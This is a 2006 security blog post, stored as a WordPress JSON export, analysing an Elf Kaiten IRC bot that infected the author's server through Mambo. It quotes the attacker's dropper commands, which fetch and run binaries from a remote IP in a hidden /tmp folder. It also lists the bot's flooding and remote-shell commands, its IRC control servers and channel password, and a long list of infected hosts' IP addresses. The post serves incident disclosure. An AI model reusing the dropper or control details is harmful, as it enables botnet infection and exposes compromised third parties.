{"id":111,"date":"2006-06-05T01:02:37","date_gmt":"2006-06-05T05:02:37","guid":{"rendered":"http:\/\/blogs.law.harvard.edu\/zeroday\/2006\/06\/05\/more-attacks-on-my-web-server\/"},"modified":"2006-06-06T00:04:23","modified_gmt":"2006-06-06T04:04:23","slug":"more-attacks-on-my-web-server","status":"publish","type":"post","link":"https:\/\/archive.blogs.harvard.edu\/zeroday\/2006\/06\/05\/more-attacks-on-my-web-server\/","title":{"rendered":"More attacks on my web server [Elf Kaiten.AQ]"},"content":{"rendered":"

the same as the last one which was based on Mambo (open source CMS). This time I was able to pull the files down in time.
\nEDIT: More information here
\ndocumented by enkrypted<\/a>
\nUPDATE: Secunia reports this as Elf Kaiten.AQ<\/a>
\nTrendMicro reports the trojan but the statistics are horribly wrong. Just the channel I’m monitoring alone has seen hundreads of infections via Mambo<\/a><\/p>\n

wget 72.18.195.161\/lnikon<\/p>\n

This leads to a small script which executes the following:
\ncd \/tmp
\nmkdir .font-jix
\ncd .font-jix
\nwget 72.18.195.161\/linux-kernel
\nchmod +x linux-kernel
\n.\/linux-kernel
\ncd \/tmp
\ncd .font-jix
\nwget 72.18.195.161\/linux-mkdir
\nchmod +x linux-mkdir
\n.\/linux-mkdir<\/p>\n

I won’t paste the strings results from the files here but sufficed to say it’s headed towards an irc server. I did find these servers listed:
\n67.43.234.119
\nirc.newchrousty.org
\nSympatico.Qc.Ca.NewChrousty.org
\nTrois-Rivieres.Qc.Ca.NewChrousty.org
\nChat.NewChrousty.Org
\nMicro-ISP.NewChrousty.Org
\nLaLiPuS.NewChrousty.Org<\/p>\n

Some other interesting strings:
\nNOTICE %s :PAN
\nNOTICE %s :Panning %s.
\nNOTICE %s :TSUNAMI
\nNOTICE %s :Tsunami heading for %s.
\nNOTICE %s :What kind of subnet address is that? Do something like: 169.40
\nNOTICE %s :TSUNAMI = Special packeter that wont be blocked by most firewalls
\nNOTICE %s :PAN = An advanced syn flooder that will kill most network drivers
\nNOTICE %s :UDP = A udp flooder
\nNOTICE %s :UNKNOWN = Another non-spoof udp flooder
\nNOTICE %s :NICK = Changes the nick of the client
\nNOTICE %s :SERVER = Changes servers
\nNOTICE %s :GETSPOOFS = Gets the current spoofing
\nNOTICE %s :SPOOFS = Changes spoofing to a subnet
\nNOTICE %s :DISABLE = Disables all packeting from this client
\nNOTICE %s :ENABLE = Enables all packeting from this client
\nNOTICE %s :KILL = Kills the client
\nNOTICE %s :GET = Downloads a file off the web and saves it onto the hd
\nNOTICE %s :VERSION = Requests version of client
\nNOTICE %s :KILLALL = Kills all current packeting
\nNOTICE %s :HELP = Displays this
\nNOTICE %s :IRC = Sends this command to the server
\nNOTICE %s :SH = Executes a command<\/p>\n

UPDATE: Everything goes to a channel called #mambolizo with password ‘leet’
\nHere is a sample of infected IP’s<\/p>\n

#mambolizo AUSTI H ~KVDJQ@81.192.114.78 (ZVYRRUU)
\n#mambolizo AXEUGVS H ~RUSC@80.71.219.42 (NUVQT)
\n#mambolizo AZBCPAT H ~QTBQJGAH@217.126.24.185 (LVNVG)
\n#mambolizo Aarh H ~discern@63.89.31.130 (silenc)
\n#mambolizo Aarhu H ~sett@63.89.31.130 (chef)
\n#mambolizo Aarhus H ~psych@63.89.31.130 (Aarhus)
\n#mambolizo BDMIO H ~EHKFTIRL@81.15.157.171 (DJVB)
\n#mambolizo BEUKTL H ~WCBJMEWJ@81.223.209.211 (EHTSVU)
\n#mambolizo BFFENJ H ~HZTMPV@217.157.235.41 (KWTE)
\n#mambolizo BFJEK H ~TFPS@213.55.30.241 (AZOSUKK)
\n#mambolizo BGYUO H ~QLOJD@193.157.66.96 (HJCRMV)
\n#mambolizo BLFDWBC H ~IGNYV@69.60.124.43 (UIQP)
\n#mambolizo BLMWK H ~PFWTCHIQ@202.155.6.237 (LAZYZN)
\n#mambolizo BMJQF H network@68.51.46.205 (UNSRD)
\n#mambolizo BPIJ H ~AWWLXM@202.83.174.36 (PMTFK)
\n#mambolizo BPPTPSN H ~ALCTDEWH@85.17.6.163 (YXQDAYQ)
\n#mambolizo BUXL H ~FBGNOOO@68.189.182.37 (VCGZ)
\n#mambolizo BXXMOK H ~ZBDKNNE@202.129.46.90 (GSWTDH)
\n#mambolizo CAHI H ~MTCSU@129.105.249.208 (JMLZ)
\n#mambolizo CAIZFQV H ~QPRM@82.165.177.236 (FODPLD)
\n#mambolizo CBZYU H ~AFBZKZ@85.20.35.66 (PFBBQXJR)
\n#mambolizo CCMLG H ~QSZKPUD@194.106.17.163 (DGLJLZD)
\n#mambolizo CCQPE H ~RELLEXA@61.220.191.21 (NTLI)
\n#mambolizo CCQRYBDM H ~FGHQRKAZ@24.63.215.68 (KFYBYOPR)
\n#mambolizo CDDDJBKB H ~DHXFP@201.217.215.66 (SWCVII)
\n#mambolizo CFGXYWV H ~THCRIR@85.124.118.43 (GFDWO)
\n#mambolizo CHABLA H ~XFGRR@193.157.66.96 (JDXK)
\n#mambolizo CHDQT H ~YUVWLSI@62.90.45.58 (BVLS)
\n#mambolizo CIUKSB H ~IGYF@207.170.12.72 (WUJHUJSG)
\n#mambolizo CLOAVSF H ~KPILEJS@213.55.30.241 (FPTVTLKI)
\n#mambolizo CLSA H ~ARZIVGWJ@24.63.215.68 (XXPG)
\n#mambolizo CTEM H ~VCDHTEE@130.234.7.72 (HKHTFIA)
\n#mambolizo CUKXSY H ~SDZLBNG@193.95.249.225 (JLGZS)
\n#mambolizo CUPKX H ~SIIEQCX@201.224.164.91 (LLVKOKO)
\n#mambolizo CWYKTNJ H ~QVPP@61.178.85.114 (BXUPLXM)
\n#mambolizo CXOWBXKI H ~ZJPVHC@213.55.30.241 (QZJP)
\n#mambolizo CZZPVI H ~JMCL@68.143.64.178 (HFQWJH)
\n#mambolizo DANMLPKU H ~JMGVKQ@61.220.191.9 (WGCJWERN)
\n#mambolizo DATECLLS H www-data@217.126.49.173 (XQHI)
\n#mambolizo DBBHZ H ~NTUT@203.55.23.51 (FTOMOL)
\n#mambolizo DIJZMBU H ~RECI@196.209.16.57 (KJTY)
\n#mambolizo DIKOUW H ~WVRFYL@24.28.88.134 (VKVLXCSJ)
\n#mambolizo DLIWY H www-data@62.94.123.42 (QPZN)
\n#mambolizo DOWC H ~ZVJL@213.55.30.241 (OPKSJ)
\n#mambolizo DRKGEP H ~QRYV@69.40.247.160 (RAEGOPKP)
\n#mambolizo DYFTYUG H ~GGDRNI@213.225.48.85 (GBVJOKOF)
\n#mambolizo DYZDB H ~CNLNG@193.157.66.96 (GDVKBW)
\n#mambolizo DZFZOVII H ~VSHPVG@84.170.216.17 (JHXUMND)
\n#mambolizo DZRU H ~JXCHPQX@202.143.173.83 (JRIRFKAJ)
\n#mambolizo EAISZOUV H hidden-use@163.21.50.253 (ZWQPAHN)
\n#mambolizo EARBYA H ~DEIF@130.13.141.109 (EIRJLAMR)
\n#mambolizo EARBYG H ~TPRULQW@213.243.33.117 (XJDI)
\n#mambolizo EGTE H ~RWBHQPDH@218.226.219.50 (LNIK)
\n#mambolizo ELTKP H ~ZEDEQK@83.30.227.15 (NNUKQM)
\n#mambolizo EMJD H ~BPLL@83.133.81.92 (FIARDNC)
\n#mambolizo EQBPZKH H ~JELWXQG@67.161.213.233 (HYDRCKDU)
\n#mambolizo EQPL H ~JJXJ@202.143.101.131 (DNHJQW)
\n#mambolizo FCWJE H ~JQLN@203.172.129.2 (VNSFD)
\n#mambolizo FGPBYTK H ~YJOKZQ@203.55.23.201 (PIKEA)
\n#mambolizo FGPBYTK H ~YJOKZQ@203.55.23.51 (PIKEA)
\n#mambolizo FKTN H ~FENLCJWQ@194.106.17.163 (FQWXA)
\n#mambolizo FPQXF H ~KOGHXI@81.223.209.211 (HMDH)
\n#mambolizo FUDJ H ~LDKVXAK@208.200.133.2 (GCDVMC)
\n#mambolizo GDBUUEX H ~VKOK@217.149.127.14 (FHFKBT)
\n#mambolizo GDBYKPKT H ~FCVFJCOB@69.60.124.43 (LGITHJ)
\n#mambolizo GDZJWT H ~OVFVDTWX@84.57.40.96 (YFXKHJ)
\n#mambolizo GEQNJVP H ~LILIWKOF@213.243.33.117 (EGMHFA)
\n#mambolizo GGCBZ H ~AOLZC@140.113.214.180 (CWAB)
\n#mambolizo GJATO H ~QSEK@82.151.192.61 (AGQPV)
\n#mambolizo GKHJX H ~WFXYXSI@201.135.134.24 (CTYSG)
\n#mambolizo GLUGHMP H ~LTDVBWSE@130.94.124.180 (FBWJ)
\n#mambolizo GOTTSJXC H ~MICTUNNR@61.183.207.183 (NFPBHG)
\n#mambolizo GUAOBGG H ~MKVQSWY@147.123.155.1 (CMSRZ)
\n#mambolizo GUYW H ~PAGXEM@67.53.244.228 (XTIN)
\n#mambolizo GXVAAI H ~VMPX@81.185.145.216 (AVTYXUBA)
\n#mambolizo GZHEFEG H ~LMVQXFJF@61.183.207.183 (NUNDDSEG)
\n#mambolizo HAZBZF H ~TSPKOA@202.51.31.246 (IQIKO)
\n#mambolizo HFPSGS H ~BZMUKKGZ@66.77.26.70 (GLKAKIC)
\n#mambolizo HYHHWVZ H ~PJBGTB@151.42.226.237 (YASI)
\n#mambolizo IAMARBMY H ~XTEKZPG@210.173.173.29 (XJNJIYOD)
\n#mambolizo ICIPEYX H ~PVEBNWFZ@217.126.233.168 (ABUTYCLZ)
\n#mambolizo ICJQTBW H ~LAKULZNH@206.248.136.95 (AXTOOZY)
\n#mambolizo IJBTV H ~COZRLFS@83.18.171.82 (ISALRYV)
\n#mambolizo IKJAJ H ~DPGY@201.102.71.14 (CAJMCB)
\n#mambolizo IOUEJS H ~PKVY@201.135.134.24 (FEGH)
\n#mambolizo IVOCSE H ~QPLT@82.149.166.130 (JZWLWXG)
\n#mambolizo IWJCB H ~TFDKHNL@81.235.163.148 (TWNSMVC)
\n#mambolizo JFKDMPW H ~PRWEH@149.156.5.206 (TLUWXDR)
\n#mambolizo JGQCU H ~YYMEHSAP@217.194.97.70 (SZEJFKNQ)
\n#mambolizo JSUVEF H ~XWCUGCY@83.18.171.82 (TYOVFQH)
\n#mambolizo JTGX H ~WRTL@65.75.138.190 (RNFX)
\n#mambolizo KAJXDC H ~XUPPT@213.169.62.179 (TWSP)
\n#mambolizo KARLYLG H ~OXHGW@69.60.124.43 (AHQJPJB)
\n#mambolizo KEMP H ~FDCL@80.32.194.218 (RYXZDOFZ)
\n#mambolizo KENLHRT H ~SKGU@219.117.251.138 (MFXC)
\n#mambolizo KJUFOM H ~ZCNFYM@82.226.252.2 (FQCMBT)
\n#mambolizo KNMH H ~UCSYGE@203.125.140.52 (NXOSOEM)
\n#mambolizo KOZPTXL H ~LQROMHV@209.200.14.230 (PZNP)
\n#mambolizo KUBVHXA H ~RVOKD@202.155.108.36 (OOCQBL)
\n#mambolizo KVNE H ~FYZCCF@69.159.203.110 (XTCRZ)
\n#mambolizo LCVNCLWI H ~CYCBXJM@203.219.147.14 (PSCRO)
\n#mambolizo LJBNJPR H ~YYFQIM@194.106.17.163 (ORKU)
\n#mambolizo LKQOBCR H ~UFCAXS@83.109.10.152 (FDQXQ)
\n#mambolizo LMXMHIL H ~PAMUKHBU@84.157.157.8 (DRTX)
\n#mambolizo LUMI H ~DUSGPLUQ@61.178.85.114 (XLCDPC)
\n#mambolizo LWNPI H ~XKDFDUFZ@83.133.81.92 (VBUPE)
\n#mambolizo MDSZWP H ~KOFUXKDT@64.146.134.133 (AMLM)
\n#mambolizo MNJVN H ~KPPEKY@65.204.137.200 (FRTRJRX)
\n#mambolizo MNLTYGNB H ~DZOEL@85.53.64.206 (IMQTC)
\n#mambolizo MQOFNW H ~GZGC@66.77.26.70 (RVBZQMCR)
\n#mambolizo MSQQKO H ~GZVTAMV@209.200.14.230 (XZXWNV)
\n#mambolizo MUVF H ~RAPR@202.172.54.61 (KCMSZSAP)
\n#mambolizo NDVC H ~IDIY@207.225.61.10 (AERF)
\n#mambolizo NFRC H ~JZBF@80.34.96.60 (BVFMEPT)
\n#mambolizo NHGZ H ~HSOOIPV@195.117.103.58 (HARGJ)
\n#mambolizo NNCXJJUD H ~ULST@81.241.202.21 (FLDSMSFH)
\n#mambolizo NOBMQ H ~GMHFK@69.64.49.62 (PWPRV)
\n#mambolizo NQQG H ~NOUP@66.77.26.70 (LMYTO)
\n#mambolizo NQUUBED H ~SSTLZW@81.223.209.211 (RGAOYT)
\n#mambolizo NSFCMC H ~EMVAI@203.55.23.201 (VHGIDT)
\n#mambolizo NSFCMC H ~EMVAI@203.55.23.51 (VHGIDT)
\n#mambolizo OHIJSLD H ~RKFDPEQ@217.194.97.70 (XDZP)
\n#mambolizo OKMBMPZH H ~CGYYJU@213.55.30.241 (EJPRHUP)
\n#mambolizo OOZGM H ~RMWD@84.87.219.36 (UMRTUVJ)
\n#mambolizo OQBIPNE H ~FRBI@12.36.175.159 (HLNUXRE)
\n#mambolizo OSUFFLN H ~CDWR@81.57.87.84 (SSFILJM)
\n#mambolizo OWWX H ~PYSCZ@66.160.135.87 (SEEG)
\n#mambolizo OXBQOHG H ~ESDIGP@195.117.179.10 (IRMB)
\n#mambolizo OYXU H ~RLCKXFI@193.170.41.50 (VYBMH)
\n#mambolizo OZAW H ~EEARLYDZ@194.144.126.233 (GFQVEZ)
\n#mambolizo PESOQIV H ~QBETMCB@82.236.226.54 (VFPMBQRE)
\n#mambolizo PFJOZ H ~ZLPNODPB@141.21.7.60 (VDIW)
\n#mambolizo PFVHK H ~PFGR@217.206.217.199 (XXIO)
\n#mambolizo PHQWJN H ~SSNITPJ@203.55.23.201 (KOZVB)
\n#mambolizo PVZB H ~EHDJJNT@82.226.118.139 (KRMNB)
\n#mambolizo PZAHGJI H ~MDVPQJV@202.143.173.83 (BYTLFC)
\n#mambolizo QBUITDX H ~DZOEL@85.53.64.206 (IMQTC)
\n#mambolizo QDCNYMS H ~HFXJM@64.242.180.2 (JSNAOR)
\n#mambolizo QNHPC H www-data@149.156.124.6 (GWTJQULB)
\n#mambolizo QUENMWN H ~BFKTK@24.31.6.188 (MQQV)
\n#mambolizo QYUEMXD H ~TAIK@213.54.172.75 (YSZEWBU)
\n#mambolizo QYUEMXD H ~TAIK@85.212.30.189 (YSZEWBU)
\n#mambolizo RAOBFQ H ~SBYWMC@61.7.147.47 (YPVFVERO)
\n#mambolizo RBOVLKIT H ~ZKGEC@81.209.59.194 (HKEXGZ)
\n#mambolizo RBXWI H ~OPVPGPU@217.170.13.48 (VPWRI)
\n#mambolizo RCPQMAKE H ~EEGGOQ@213.228.166.47 (BAFQV)
\n#mambolizo RDHFDU H ~ITBNE@82.155.145.235 (XYKWRWKZ)
\n#mambolizo RGDFZTMA H ~ZVZKTVVL@64.76.81.153 (FCQZ)
\n#mambolizo RJOWRVQB H ~NBJH@193.68.47.28 (ONOFS)
\n#mambolizo RMOSO H ~QOVPYK@201.17.175.51 (MHRRMUB)
\n#mambolizo ROWA H ~WJNHEAIZ@130.94.124.180 (CSETK)
\n#mambolizo RQYEFCO H ~PRGHXC@80.32.194.218 (XFBCC)
\n#mambolizo RSYGMGNZ H ~PUAQLO@193.40.142.254 (GUAD)
\n#mambolizo RUJG H ~ACVZ@68.189.182.37 (FLTABBA)
\n#mambolizo RXBV H ~MZUW@217.227.216.244 (AFVWDV)
\n#mambolizo RXBV H ~MZUW@217.227.226.182 (AFVWDV)
\n#mambolizo RZYDFBT H ~SGEOXUL@217.170.13.48 (NOPBQH)
\n#mambolizo SAURG H ~FDKKWST@193.170.41.50 (VHKN)
\n#mambolizo SBUXGR H ~AOLZC@140.113.214.180 (CWAB)
\n#mambolizo SCLT H ~TIQCMYV@217.206.217.199 (KHXRV)
\n#mambolizo SDXL H ~YMJVN@194.210.98.160 (XMCLL)
\n#mambolizo SEVRKJE H ~DNPT@83.28.39.209 (CUUPNS)
\n#mambolizo SEXWCEP H ~CRZBRIS@194.242.112.72 (EFUV)
\n#mambolizo SGLVRMEC H hidden-use@163.21.50.253 (RJLCLPZH)
\n#mambolizo SHDEMF H ~ODWMB@217.194.97.70 (YBMJJ)
\n#mambolizo SKAZE H ~EPCVZOKX@218.208.118.66 (SALC)
\n#mambolizo SKFIJTQ H ~VQFM@217.194.97.70 (QTXSSIWL)
\n#mambolizo SLBV H ~UDCWYGU@141.21.7.60 (NWESN)
\n#mambolizo SNJJRJNW H ~AYMTX@84.157.129.23 (GEDSORSY)
\n#mambolizo SNJJRJNW H ~AYMTX@84.157.197.113 (GEDSORSY)
\n#mambolizo SNUK H ~KTACK@209.200.14.230 (RYCBPV)
\n#mambolizo SPDR H ~GJOTW@209.172.33.199 (BZSAJMBC)
\n#mambolizo SSCDAPCS H ~FBBCYTAU@61.178.85.114 (VHALHLC)
\n#mambolizo SSQGHMH H ~VJVO@87.78.22.107 (MIPBN)
\n#mambolizo SSSZEAD H ~VAHAR@213.225.48.85 (YEAQJL)
\n#mambolizo TCJJXJ H ~TFPS@62.217.143.90 (AZOSUKK)
\n#mambolizo TCJS H ~PIHOXNG@196.28.49.199 (JXUMUDP)
\n#mambolizo TDMVTPAQ H ~MXRRVGGE@82.165.37.165 (BARPIQB)
\n#mambolizo TDUQZKXN H ~XAPAFYDJ@209.216.245.146 (PVOOD)
\n#mambolizo TEYTUIAP H ~YVFF@81.190.195.44 (EVLVIVRP)
\n#mambolizo TFNX H ~RSQPBS@82.151.192.61 (RSKLC)
\n#mambolizo THAQRBF H ~PQXZMFG@84.157.157.8 (OSXP)
\n#mambolizo TKFWFFW H ~GOPC@147.123.155.1 (MVQNLUW)
\n#mambolizo TKRKMOWV H ~AMFVAX@213.55.30.241 (CRJO)
\n#mambolizo TMEAMDQ H ~NTBMC@201.252.133.28 (EOVXNYS)
\n#mambolizo TMKUCU H ~MDAPF@202.143.162.98 (DUQANROU)
\n#mambolizo TOFQVCBJ H ~ZSKUYBYN@84.149.127.173 (YMUPV)
\n#mambolizo TOFQVCBJ H ~ZSKUYBYN@84.149.95.234 (YMUPV)
\n#mambolizo TPMIJD H ~YGUFM@130.94.124.180 (IBVJLDOI)
\n#mambolizo TRBTSS H ~AHMT@84.19.188.50 (FHTYM)
\n#mambolizo TROPYYWG H ~NZWO@203.55.23.201 (ABATV)
\n#mambolizo TUCJQB H ~PQZWTXZ@83.18.171.82 (EGVFI)
\n#mambolizo TXJRS H ~AGFHDY@67.161.213.233 (KYDT)
\n#mambolizo UBAG H ~MIKSLQWA@69.56.145.164 (IYUL)
\n#mambolizo UDEBAS H ~BFWLLE@217.157.235.41 (EOJDZU)
\n#mambolizo UGMNX H ~PVJKLW@203.55.23.201 (ANWOSOAK)
\n#mambolizo UGMNX H ~PVJKLW@203.55.23.51 (ANWOSOAK)
\n#mambolizo ULOV H ~PJOHXM@64.8.101.98 (IHFAMPE)
\n#mambolizo UMBAVBD H ~PULOQIE@201.135.134.24 (VYDWNXFO)
\n#mambolizo UPJREYD H ~WQUG@203.214.54.20 (ELEWRN)
\n#mambolizo UVPTWOUH H ~DZWC@147.102.101.91 (ESVQ)
\n#mambolizo VAZY H ~QPXYKO@203.55.23.51 (GMAIMGYH)
\n#mambolizo VDWD H ~CXRCMW@68.18.93.131 (MSOZRSR)
\n#mambolizo VEMQW H ~OGAZRKS@130.94.124.180 (FMALIBDI)
\n#mambolizo VFKRTQK H ~CPUYPZV@69.40.247.160 (BWFQ)
\n#mambolizo VKYPGN H ~RVTRABT@193.157.66.96 (JFVEWAPY)
\n#mambolizo VNPE H ~TFTH@213.55.30.241 (CFXTI)
\n#mambolizo VVPGC H ~VPGL@82.151.199.57 (SEDXUJTO)
\n#mambolizo VYPUVJJ H apache@148.244.169.141 (BCTF)
\n#mambolizo VZBQBK H ~DMZJJKEN@69.196.142.78 (DYPMFCGI)
\n#mambolizo WEANO H ~PCXCXWEG@83.18.171.82 (CWNVDO)
\n#mambolizo WKFJYXMW H ~WWBB@212.98.165.220 (HQSKN)
\n#mambolizo WQYEGXY H ~TIUSRLG@83.133.81.92 (KXCFM)
\n#mambolizo WSIJLO H ~BIXU@130.94.124.180 (YCUQQHZ)
\n#mambolizo WTPDHZ H ~PUSWTV@69.60.124.43 (TJVPZCLQ)
\n#mambolizo WVEAKNI H ~PRHBM@204.1.16.2 (ZIJALNH)
\n#mambolizo WVHQX H ~PZGUAAQD@82.236.226.54 (JFOOWP)
\n#mambolizo WZHSWZE H ~VWSBA@24.31.6.188 (DWXDOXF)
\n#mambolizo XACGE H ~PVKI@213.60.56.216 (JTDEML)
\n#mambolizo XBCYE H ~JSBRQ@193.157.66.96 (CQXQY)
\n#mambolizo XBGMKWFT H ~XVEJLF@202.172.239.112 (HJUJPF)
\n#mambolizo XCKHTC H ~VJTSL@219.94.130.26 (DTVGLPGL)
\n#mambolizo XICWY H ~HBZVYDZY@24.63.215.68 (TKQIVHC)
\n#mambolizo XNAOKHY H ~UVLH@85.53.64.206 (VPHOIOM)
\n#mambolizo XPMIJ H ~RCXMIP@67.53.244.228 (KJLM)
\n#mambolizo XQIQR H ~JZWRVZW@206.33.2.132 (OHAY)
\n#mambolizo XTDWV H ~SFHVQA@203.55.23.201 (KYQPKBJ)
\n#mambolizo XTDWV H ~SFHVQA@203.55.23.51 (KYQPKBJ)
\n#mambolizo XVADU H ~SPJR@217.206.217.199 (SMMXING)
\n#mambolizo XXVOR H ~MEUVLICC@194.106.17.163 (KGOZT)
\n#mambolizo YBHDN H ~ANSRK@69.60.124.43 (PCMT)
\n#mambolizo YCWVOQS H ~VAHAR@213.225.48.85 (YEAQJL)
\n#mambolizo YDRBQVP H ~KHHGR@202.71.143.2 (EKJRWSD)
\n#mambolizo YEYMEGHV H ~LCQYVW@84.149.127.173 (JJDB)
\n#mambolizo YEYMEGHV H ~LCQYVW@84.149.95.234 (JJDB)
\n#mambolizo YFADXOXO H ~RIRY@82.226.118.139 (FOBA)
\n#mambolizo YGTGW H ~GJAX@80.32.194.218 (LKIWEUOI)
\n#mambolizo YKBEJBR H ~NWCK@203.219.147.14 (WDQHWIYX)
\n#mambolizo YLBIVW H ~DHMM@84.255.202.157 (MIBEYIW)
\n#mambolizo YQTTOQGI H ~RGQNUXW@85.234.143.14 (AJFO)
\n#mambolizo YRODPMA H ~NSPLIXE@82.226.252.2 (UQVTRTFM)
\n#mambolizo YYNN H ~WJTKTGY@67.161.213.233 (JRXX)
\n#mambolizo ZJZYZNIZ H ~VMFIZB@66.77.26.70 (BJOETM)
\n#mambolizo ZMYJZRMN H ~SSTLZW@81.223.209.211 (RGAOYT)
\n#mambolizo ZNEV H ~LABU@202.143.162.98 (UEFA)
\n#mambolizo ZOIA H ~VMMHAW@151.1.140.34 (XGTEB)
\n#mambolizo ZXNLPD H ~SLIBKNS@82.146.17.37 (ROHJSIC)
\n#mambolizo ZZCHGQ H ~OUPNMIZQ@83.138.146.85 (DCEHMJE)<\/p>\n

If you are on this list format, reinstall now.<\/p>\n","protected":false},"excerpt":{"rendered":"

the same as the last one which was based on Mambo (open source CMS). This time I was able to pull the files down in time. EDIT: More information here documented by enkrypted UPDATE: Secunia reports this as Elf Kaiten.AQ TrendMicro reports the trojan but the statistics are horribly wrong. Just the channel I’m monitoring […]<\/p>\n","protected":false},"author":214,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[272,275,431],"tags":[],"class_list":["post-111","post","type-post","status-publish","format-standard","hentry","category-digital-warfare","category-vulnerabilities","category-zeroday"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/111","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/users\/214"}],"replies":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/comments?post=111"}],"version-history":[{"count":0,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/111\/revisions"}],"wp:attachment":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/media?parent=111"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/categories?post=111"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/tags?post=111"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}